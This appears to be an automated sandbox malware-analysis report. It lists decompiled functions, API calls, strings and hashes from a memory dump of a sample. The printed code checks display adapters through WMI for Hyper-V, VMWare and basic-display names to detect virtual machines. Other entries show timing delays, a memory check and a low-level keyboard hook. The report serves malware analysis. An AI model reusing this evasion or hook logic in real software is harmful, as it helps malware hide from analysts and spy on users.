Opcode ID: e0e76a9253ea4e7d51fbe12c7998101bff1d8e9b8efef846fc61301ff14f88bd
Instruction ID: af23d29fe526a1b16e321764dda8e6b8bd8abf4caf2a54ed849dc3d0cb492b55
Opcode Fuzzy Hash: e0e76a9253ea4e7d51fbe12c7998101bff1d8e9b8efef846fc61301ff14f88bd
Instruction Fuzzy Hash: 1351C932504205ABDF249B6B8D41FAF77A9AF5A324F10425FF82596282DB3DD900966C

Uniqueness

Uniqueness Score: -1.00%

Function 0043879C, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E0043879C(void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				void* _v48;
				WCHAR* _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				intOrPtr* _v88;
				intOrPtr* _v96;
				signed int _t38;
				void* _t40;
				intOrPtr* _t45;
				intOrPtr* _t52;
				intOrPtr* _t54;
				WCHAR* _t58;
				intOrPtr* _t61;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t89;
				char _t91;
				signed int _t94;

				_t96 = (_t94 & 0xfffffff8) - 0x28;
				_t38 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t38 ^ (_t94 & 0xfffffff8) - 0x00000028;
				_t91 = 0;
				_push(__ecx);
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_t40 = E0043F5AD( &_v36,  &_v32);
				_pop(_t67);
				if(_t40 != 0) {
					_push( &_v40);
					if(E0043F667( &_v32) != 0) {
						_t73 = _v40;
						_v44 = 0;
						_v12 = 0;
						if(_t73 != 0) {
							_t89 =  *0x4ed62c; // 0x49e6ea
							while(1) {
								 *((intOrPtr*)( *_t73 + 0x10))(_t73, 0xffffffff, 1,  &_v44,  &_v12);
								if(_v32 == _t91) {
									goto L14;
								}
								_t52 = _v64;
								_push(_t91);
								_push(_t91);
								_push( &_v48);
								_push(_t91);
								_push(L"Caption");
								_push(_t52); // executed
								if( *((intOrPtr*)( *_t52 + 0x10))() < 0) {
									L11:
									_t54 = _v88;
									 *((intOrPtr*)( *_t54 + 8))(_t54);
									_t73 = _v88;
									if(_t73 != 0) {
										continue;
									} else {
									}
								} else {
									if(_v72 != 8) {
										L10:
										 *0x4ed604( &_v72);
										goto L11;
									} else {
										_t58 = StrStrIW(_v64, L"Hyper-V"); // executed
										if(_t58 != 0) {
											L13:
											 *0x4ed604( &_v76);
											_t61 = _v96;
											 *((intOrPtr*)( *_t61 + 8))(_t61);
											_t91 = 1;
										} else {
											_push(L"Microsoft Basic Display Adapter");
											_push(_v68);
											if( *_t89() != 0) {
												goto L13;
											} else {
												_push(L"VMWare");
												_push(_v76);
												if( *_t89() != 0) {
													goto L13;
												} else {
													goto L10;
												}
											}
										}
									}
								}
								goto L14;
							}
						}
						L14:
						_t45 = _v36;
						 *((intOrPtr*)( *_t45 + 8))(_t45);
						_t75 = _v36;
						 *((intOrPtr*)( *_t75 + 8))(_t75);
						_t76 = _v48;
						 *((intOrPtr*)( *_t76 + 8))(_t76);
						 *0x4ed810(); // executed
					}
				}
				return L0049CE1D(_v8 ^ _t96);
			}

0x004387a2
0x004387a5
0x004387ac
0x004387b2
0x004387b8
0x004387bd
0x004387c1
0x004387c5
0x004387c9
0x004387ce
0x004387d1
0x004387dc
0x004387ee
0x004387f4
0x004387f8
0x004387fc
0x00438802
0x00438808
0x0043880e
0x0043881f
0x00438826
0x00000000
0x00000000
0x0043882c
0x00438834
0x00438835
0x00438836
0x00438839
0x0043883a
0x0043883f
0x00438845
0x00438887
0x00438887
0x0043888e
0x00438891
0x00438897
0x00000000
0x00000000
0x0043889d
0x00438847
0x0043884d
0x0043887c
0x00438881
0x00000000
0x0043884f
0x00438858
0x0043885c
0x0043889f
0x004388a4
0x004388aa
0x004388b1
0x004388b6
0x0043885e
0x0043885e
0x00438863
0x0043886b
0x00000000
0x0043886d
0x0043886d
0x00438872
0x0043887a
0x00000000
0x00000000
0x00000000
0x00000000
0x0043887a
0x0043886b
0x0043885c
0x0043884d
0x00000000
0x00438845
0x0043880e
0x004388b7
0x004388b7
0x004388be
0x004388c1
0x004388c8
0x004388cb
0x004388d2
0x004388d5
0x004388d5
0x004387ee
0x004388ed

APIs

StrStrIW.SHLWAPI(?,Hyper-V), ref: 00438858

Strings

Caption, xrefs: 0043883A
VMWare, xrefs: 0043886D
I, xrefs: 00438808
Hyper-V, xrefs: 0043884F
Microsoft Basic Display Adapter, xrefs: 0043885E

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Caption$Hyper-V$Microsoft Basic Display Adapter$VMWare$I
API String ID: 0-2571656855
Opcode ID: b954a7e0e0a7886b4ade209102527ca93faec4aa3c3b4ac8daae5b98ffce4332
Instruction ID: cad59449631d3d9305af6ef8d900ebbb3397a1077be9872861ffa1e9e56699b9
Opcode Fuzzy Hash: b954a7e0e0a7886b4ade209102527ca93faec4aa3c3b4ac8daae5b98ffce4332
Instruction Fuzzy Hash: 7E417C71608302AFC708EF25C884D5BBBE8EFC8754F104A6EF55997260DB30D949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004384DC, Relevance: 9.1, APIs: 6, Instructions: 63timeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004384F8
CreateTimerQueue.KERNEL32 ref: 00438508
CreateTimerQueueTimer.KERNEL32(?,00000000,004383F8,DEADBEEF,?,00000000,00000000), ref: 00438529
DeleteTimerQueueEx.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00438553
FindCloseChangeNotification.KERNEL32(?,00000000,00000000), ref: 0043855F

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Timer$CreateQueue$ChangeCloseDeleteEventFindNotification
String ID:
API String ID: 1193074645-0
Opcode ID: 9d3a638cbf3fa7ad9675427c27a566b3e249542f6da8023172fa6b75c9e9d538
Instruction ID: 7888dbb48d0deadb994a1a1ebbf2c1508fcd02696938e2dc5877689eda986515
Opcode Fuzzy Hash: 9d3a638cbf3fa7ad9675427c27a566b3e249542f6da8023172fa6b75c9e9d538
Instruction Fuzzy Hash: E811A571600215BFEB048F65FC84D7BBAACEB48395750103EB907D2211DE749D10DA68

Uniqueness

Uniqueness Score: -1.00%

Function 004B2407, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 004B3009: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BAEA8,00000000,?,004AB16D,?,00000008,?,004AD0C1,?,?,00000000), ref: 004B303B

_free.LIBCMT ref: 004B2512
_free.LIBCMT ref: 004B2529
_free.LIBCMT ref: 004B2548
_free.LIBCMT ref: 004B2563
_free.LIBCMT ref: 004B257A

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 6590344c140a246e0338c9ca577d838612265a185cddcabaea799a6be5ce2334
Instruction ID: f6034767129b596bef2b2a787979fe0e688cef0b096ecb0ecbda55070cb1135e
Opcode Fuzzy Hash: 6590344c140a246e0338c9ca577d838612265a185cddcabaea799a6be5ce2334
Instruction Fuzzy Hash: BF51D731A00704AFDB21DF6ACD41BAA77F4EF48724B14456FE809D7250E779DA018B64

Uniqueness

Uniqueness Score: -1.00%

Function 004BA1EE, Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004078B0), ref: 004BA258
WideCharToMultiByte.KERNEL32(00000000,00000000,004EEA1C,000000FF,00000000,0000003F,00000000,?,?), ref: 004BA2D0
WideCharToMultiByte.KERNEL32(00000000,00000000,004EEA70,000000FF,?,0000003F,00000000,?), ref: 004BA2FD
_free.LIBCMT ref: 004BA246

Part of subcall function 004B2FCF: RtlFreeHeap.NTDLL(00000000,00000000,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?), ref: 004B2FE5
Part of subcall function 004B2FCF: GetLastError.KERNEL32(?,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?,?), ref: 004B2FF7

_free.LIBCMT ref: 004BA412

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: f96e1f1345f5607ad03e7cb585f22dbf5bd1e39733509645ea11963a3bcb89fb
Instruction ID: 04d357e43d8f1236085cb2fae0f105b059e6b35124029796e58893bf4759febd
Opcode Fuzzy Hash: f96e1f1345f5607ad03e7cb585f22dbf5bd1e39733509645ea11963a3bcb89fb
Instruction Fuzzy Hash: 6951F671800259ABCB10EF6A9C859EB77B8EF45310B1046BFE510A7392E7389E518B79

Uniqueness

Uniqueness Score: -1.00%

Function 0043845F, Relevance: 7.6, APIs: 5, Instructions: 55timesynchronizationCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000,?,00000000,FFFFD8F0,000000FF), ref: 0043848E
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 004384A3
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,FFFFD8F0,000000FF), ref: 004384B0
CancelWaitableTimer.KERNEL32(00000000,?,00000000,FFFFD8F0,000000FF), ref: 004384BE
FindCloseChangeNotification.KERNEL32(00000000,?,00000000,FFFFD8F0,000000FF), ref: 004384C5

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: TimerWaitable$CancelChangeCloseCreateFindNotificationObjectSingleWait
String ID:
API String ID: 1083498621-0
Opcode ID: 9cc8cbb757cc833fac1f7689e5b2e4045e6e0ec8eef504e644c488d7584c5a4f
Instruction ID: ccdbea19d5adb761a416066da79bc503bf1a9718c9730a1b64be876da7f10e42
Opcode Fuzzy Hash: 9cc8cbb757cc833fac1f7689e5b2e4045e6e0ec8eef504e644c488d7584c5a4f
Instruction Fuzzy Hash: 09017571601214BF87115F7A6C88E7FBFBCEECA660710423DF415D2251DE348900C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 004347BE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004347C5
_strlen.LIBCMT ref: 004347DA

Strings

0!H, xrefs: 004348A8, 004348D4, 00434850, 0043487C
,dKH, xrefs: 00434814

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_catch_strlen
String ID: ,dKH$0!H
API String ID: 3133806014-1186801689
Opcode ID: fa4764ebac466e7d30374638d86a764126c7a54d0c5442967fe89407a022579b
Instruction ID: 5ce88bcbcc5bc754847acfaa742eaa4041ee730367738a5133e28c2340b2b00f
Opcode Fuzzy Hash: fa4764ebac466e7d30374638d86a764126c7a54d0c5442967fe89407a022579b
Instruction Fuzzy Hash: E451AE78E005549FCB18EF69C8809EDBBB1BF8C314F24525AE825EB391D735AD42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043F5AD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(ROOT\CIMV2), ref: 0043F5FC
SysFreeString.OLEAUT32(00000000), ref: 0043F621
SysFreeString.OLEAUT32(00000000), ref: 0043F63C

Strings

ROOT\CIMV2, xrefs: 0043F5F7

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: String$Free$Alloc
String ID: ROOT\CIMV2
API String ID: 986138563-2786109267
Opcode ID: f50879efc72456f3417d35471ad7396918315885eea346d09e3919b43a4444a4
Instruction ID: 575ec65e1ed88dcb6f0224d6cffea78159b495e06c99076a3ef412c70ffff06e
Opcode Fuzzy Hash: f50879efc72456f3417d35471ad7396918315885eea346d09e3919b43a4444a4
Instruction Fuzzy Hash: 0D218430B40219BFD3106B66DC99F277FACFF4A799F110135F506DA1A1DA67B8068A38

Uniqueness

Uniqueness Score: -1.00%

Function 0043EDD8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,ntp,00000000,?), ref: 0043EDF7
FreeAddrInfoW.WS2_32(?), ref: 0043EE23

Strings

ntp, xrefs: 0043EDF1

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddrFreeInfogetaddrinfo
String ID: ntp
API String ID: 738001165-2791240438
Opcode ID: aa52a9a267d5e993d6b9dafff03cf3db00f07c097d8857e479f64d334cb04577
Instruction ID: 813546253c185ea69f57d150ea22e58f514157f9f190900758148c66b079ed7b
Opcode Fuzzy Hash: aa52a9a267d5e993d6b9dafff03cf3db00f07c097d8857e479f64d334cb04577
Instruction Fuzzy Hash: EDF0A472E01214BBDB219F519C42AAFB7B4DB48724F01056AE801A7341C635BE448698

Uniqueness

Uniqueness Score: -1.00%

Function 0043EDD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,ntp,00000000,?), ref: 0043EDF7

Strings

^I, xrefs: 0043EDF7
ntp, xrefs: 0043EDF1

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: getaddrinfo
String ID: ^I$ntp
API String ID: 300660673-1437380560
Opcode ID: aa52a9a267d5e993d6b9dafff03cf3db00f07c097d8857e479f64d334cb04577
Instruction ID: 813546253c185ea69f57d150ea22e58f514157f9f190900758148c66b079ed7b
Opcode Fuzzy Hash: aa52a9a267d5e993d6b9dafff03cf3db00f07c097d8857e479f64d334cb04577
Instruction Fuzzy Hash: EDF0A472E01214BBDB219F519C42AAFB7B4DB48724F01056AE801A7341C635BE448698

Uniqueness

Uniqueness Score: -1.00%

Function 004B6D93, Relevance: 4.7, APIs: 3, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e54255b557081cf236728db427bbf9409f3876fa80b2d3fbae7cb8af677069f
Instruction ID: c6ff521e39fab48017386494f0ccc93667d222964966a86b9210597ca33a3230
Opcode Fuzzy Hash: 3e54255b557081cf236728db427bbf9409f3876fa80b2d3fbae7cb8af677069f
Instruction Fuzzy Hash: D451CF71A00209ABDF119FA9D845EFF7BB8AF1A314F12015BF404A7292D73C9902CB79

Uniqueness

Uniqueness Score: -1.00%

Function 004BA349, Relevance: 4.6, APIs: 3, Instructions: 80COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004BA3BC
_free.LIBCMT ref: 004BA412

Part of subcall function 004BA1EE: _free.LIBCMT ref: 004BA246
Part of subcall function 004BA1EE: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004078B0), ref: 004BA258
Part of subcall function 004BA1EE: WideCharToMultiByte.KERNEL32(00000000,00000000,004EEA1C,000000FF,00000000,0000003F,00000000,?,?), ref: 004BA2D0
Part of subcall function 004BA1EE: WideCharToMultiByte.KERNEL32(00000000,00000000,004EEA70,000000FF,?,0000003F,00000000,?), ref: 004BA2FD

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: f0766efe5d0172bf6359540185a29b3e00efd60ac64b1790251426d7d52e640d
Instruction ID: e3eec0eb33b400744316c89813d9213bc2e7e4c022279863c91d4977750c02b7
Opcode Fuzzy Hash: f0766efe5d0172bf6359540185a29b3e00efd60ac64b1790251426d7d52e640d
Instruction Fuzzy Hash: 82213E32C0012897CB31A7259C85DEB7778CF41324F10076BF854A3192EF785E9195FA

Uniqueness

Uniqueness Score: -1.00%

Function 004AAF22, Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 004AAF6B
GetLastError.KERNEL32 ref: 004AAF77
__dosmaperr.LIBCMT ref: 004AAF7E

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 479a5b1b6d2037a72761af19e69e0e9cad5f77fad325084e61f3f56302ac4eb1
Instruction ID: 64dabecf15abf50e1c0b97aa783f84f46e0c006714f0febc9dc49da3f110676e
Opcode Fuzzy Hash: 479a5b1b6d2037a72761af19e69e0e9cad5f77fad325084e61f3f56302ac4eb1
Instruction Fuzzy Hash: C801D876504109AFCB299FA2DC05DEF7B69EFA6320F00016AFC0587210DB398D31D7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004AAE82, Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004B369F: GetLastError.KERNEL32(?,?,?,004A9673,004B2FC4,?,004B3649,00000001,00000364,?,004AADF3,004E8890,00000010), ref: 004B36A4
Part of subcall function 004B369F: _free.LIBCMT ref: 004B36D9
Part of subcall function 004B369F: SetLastError.KERNEL32(00000000), ref: 004B370D

RtlExitUserThread.KERNEL32(?,?,?,004AAFB4,?,?,004AAE2B,00000000), ref: 004AAE94
CloseHandle.KERNEL32(?,?,?,004AAFB4,?,?,004AAE2B,00000000), ref: 004AAEBC
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,004AAFB4,?,?,004AAE2B,00000000), ref: 004AAED2

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibraryUser_free
String ID:
API String ID: 1765993807-0
Opcode ID: 9810cde5d8caa70e261cae8f1b40db7f21c20f5b3738968fef222fc01693cdae
Instruction ID: f85d0011c9d6113551f714cbc55add30502266cf7d3d4c78badd48501831349d
Opcode Fuzzy Hash: 9810cde5d8caa70e261cae8f1b40db7f21c20f5b3738968fef222fc01693cdae
Instruction Fuzzy Hash: 9CF0E2301403006BCB629F35CC0CA6B7B98AF52365F154716F869C33A1DB38DC61C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 0043804F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00434A0A: __alldvrm.LIBCMT ref: 00434A47
Part of subcall function 00434A0A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434A65

__Thrd_sleep.LIBCPMT ref: 00438096

Strings

zC, xrefs: 00438084

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Thrd_sleepUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
String ID: zC
API String ID: 2244948955-3727955402
Opcode ID: 32297d2de020c3882b4c9e9223f48c4b7f161e92c82e66961db1cce230986b08
Instruction ID: 2e1f96f8df3219c6b1ffde2ac08e2d96f184b47fd7a7bc5b6b5bc153b1d90db2
Opcode Fuzzy Hash: 32297d2de020c3882b4c9e9223f48c4b7f161e92c82e66961db1cce230986b08
Instruction Fuzzy Hash: 6FF01931D002098BCF08EFA5C5818EEF7B4FB4C704F10552FE502A7241EAB86A49CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004385E5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00438612

Strings

@, xrefs: 00438607

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 9b40e4c76074056e1fe06d2686baada3a744f24ee3108fe6066016e4794167ea
Instruction ID: 68cafc695cc66c111c17dc5b2250578afaeccfb7f8b4711f3a2e283074352f60
Opcode Fuzzy Hash: 9b40e4c76074056e1fe06d2686baada3a744f24ee3108fe6066016e4794167ea
Instruction Fuzzy Hash: 0DF05471D013189BDF14EBA5D946A9EB7B8EB44754F00016EF505A2140DA786A05CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00438758, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

75426E30.POWRPROF(?), ref: 0043876F

Strings

0nBu, xrefs: 0043876F

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: 75426
String ID: 0nBu
API String ID: 327030716-1896245667
Opcode ID: 75b21dfec61ef177f6b041e20b0eed169456696315412b07fdaa1a0a0597633a
Instruction ID: 52a2d5473e516288be258e42556f0b9f9b881237965d22b29298200478379a17
Opcode Fuzzy Hash: 75b21dfec61ef177f6b041e20b0eed169456696315412b07fdaa1a0a0597633a
Instruction Fuzzy Hash: 2CF06531E0428C5FDF119FF489964FEFFB99B06304F4414AAD0D157242CA249D06D758

Uniqueness

Uniqueness Score: -1.00%

Function 0042B15C, Relevance: 3.1, APIs: 2, Instructions: 73COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042B18E
std::_Lockit::~_Lockit.LIBCPMT ref: 0042B21A

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
String ID:
API String ID: 3286764726-0
Opcode ID: 6872e3fba9253834f1ff54228b39b3e0805d7664d63717d9433000f69ea28b64
Instruction ID: e0a999df1532b4eff120b3d55a41a7eadebf3282487a9f327756634a18ec5111
Opcode Fuzzy Hash: 6872e3fba9253834f1ff54228b39b3e0805d7664d63717d9433000f69ea28b64
Instruction Fuzzy Hash: 29219E71805B40DFCB319F59EA41B5AFBF0FB09714F10866FE05A92691C7786A04CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0048902D, Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0042AB17: __EH_prolog3.LIBCMT ref: 0042AB1E

Part of subcall function 004A1116: RaiseException.KERNEL32(E06D7363,00000001,00000003,0042AA18,?,?,?,0042AA18,?,004E8ED0), ref: 004A1176

__EH_prolog3.LIBCMT ref: 00489054
std::locale::_Locimp::_Locimp_ctor.LIBCPMT ref: 004890A6

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3$ExceptionLocimp::_Locimp_ctorRaisestd::locale::_
String ID:
API String ID: 3555694526-0
Opcode ID: b2d04ec7ccd064c4bade7a7915ea1a14bf0b4e01221d86d1b09a43ce4e299121
Instruction ID: 609e2260fd298483a782d2d30822bde7939955fc64f8a47351091dd77b3156ed
Opcode Fuzzy Hash: b2d04ec7ccd064c4bade7a7915ea1a14bf0b4e01221d86d1b09a43ce4e299121
Instruction Fuzzy Hash: AE11CEB0900B49AFC710EF6AC440A8AFBF4AF18304B00C56EE59883652D774E644CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043656A, Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000), ref: 00436592
SetWindowsHookExW.USER32(0000000D,0043527C,00000000), ref: 004365A0

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleHookModuleWindows
String ID:
API String ID: 1637815062-0
Opcode ID: 5359bc77c6744d1b119d74be3b21fe046dd9245d5038d394d8a3aefeb46aa32a
Instruction ID: b0d32cd98488177756b2ce22fbb7a86962624bb5ed66f4eacbafa718af698bc2
Opcode Fuzzy Hash: 5359bc77c6744d1b119d74be3b21fe046dd9245d5038d394d8a3aefeb46aa32a
Instruction Fuzzy Hash: D2012171900284BFDB10EFB6ECC9E9B7BBCEB4C700F00043AE106DA152D6789545CB28

Uniqueness

Uniqueness Score: -1.00%

Function 004AADCE, Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(004E8890,00000010), ref: 004AADE1
RtlExitUserThread.KERNEL32(00000000), ref: 004AADE8

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorExitLastThreadUser
String ID:
API String ID: 1750398979-0
Opcode ID: c3f5c4d5eea746bf23b699d5cab324794b0dde9f41303864128498e8dcddf182
Instruction ID: b60bee2606fdc887083d5d8a4e3e0fe18d69553124f880fd3b34345cf811715f
Opcode Fuzzy Hash: c3f5c4d5eea746bf23b699d5cab324794b0dde9f41303864128498e8dcddf182
Instruction Fuzzy Hash: 9EF0AFB4540604AFDB10AF71C84AAAE3774BF85705F10019EF4069B3A2CB799D61DBB9

Uniqueness

Uniqueness Score: -1.00%

Function 0042B499, Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0042B4A0

Part of subcall function 0042B3A5: __EH_prolog3.LIBCMT ref: 0042B3AC

__Getctype.LIBCPMT ref: 0042B4C0

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3$Getctype
String ID:
API String ID: 527673020-0
Opcode ID: a95e9374e490ecb311683a873ef417f7c6d07018d849dc6b747eb7ea2af184e6
Instruction ID: 3f570ace4d46e1fae91cbdd7be7d3e36d14f2d7d3ff0f9e824f44b2e84789db7
Opcode Fuzzy Hash: a95e9374e490ecb311683a873ef417f7c6d07018d849dc6b747eb7ea2af184e6
Instruction Fuzzy Hash: A8E09231900618DADB01FF5898416CE7661AF05324F10826FB421AF1C2C7B88E04C768

Uniqueness

Uniqueness Score: -1.00%

Function 0049AC63, Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0049AC6A
_Getvals.LIBCPMT ref: 0049AC86

Part of subcall function 0049949B: __Getcvt.LIBCPMT ref: 004994AD
Part of subcall function 0049949B: std::_Locinfo::_Getdays.LIBCPMT ref: 004994C6
Part of subcall function 0049949B: std::_Locinfo::_Getmonths.LIBCPMT ref: 004994DF

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Locinfo::_std::_$GetcvtGetdaysGetmonthsGetvalsH_prolog3
String ID:
API String ID: 709374646-0
